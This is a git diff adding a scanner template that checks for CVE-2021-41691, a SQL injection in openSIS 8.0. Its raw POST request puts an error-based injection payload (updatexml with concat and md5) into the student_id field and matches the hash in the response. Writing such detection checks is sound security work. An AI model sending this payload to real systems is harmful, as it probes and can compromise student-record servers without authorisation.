diff --git a/cves/2022/CVE-2021-41691.yaml b/cves/2022/CVE-2021-41691.yaml new file mode 100644 index 0000000000..3ec63fe523 --- /dev/null +++ b/cves/2022/CVE-2021-41691.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQl Injection Vulnerability + author: Bartu Utku SARP + severity: high + description: description + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691 + tags: cve,cve2021,opensis,sql + classification: + cve-id: CVE-2021-41691 + +requests: +- raw: + - | + POST /opensis/TransferredOutModal.php?modfunc=detail HTTP/1.1 + Content-Length: 103 + Host: {{Hostname}} + Cookie: {{Cookie}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Upgrade-Insecure-Requests: 1 + Sec-Fetch-Dest: document + Sec-Fetch-Mode: navigate + Sec-Fetch-Site: none + Sec-Fetch-User: ?1 + Cache-Control: max-age=0 + Te: trailers + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12 + Connection: close + + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + matchers: + - type: word + words: + - "dc9bdb52d04dc20036dbd8313ed055" + part: body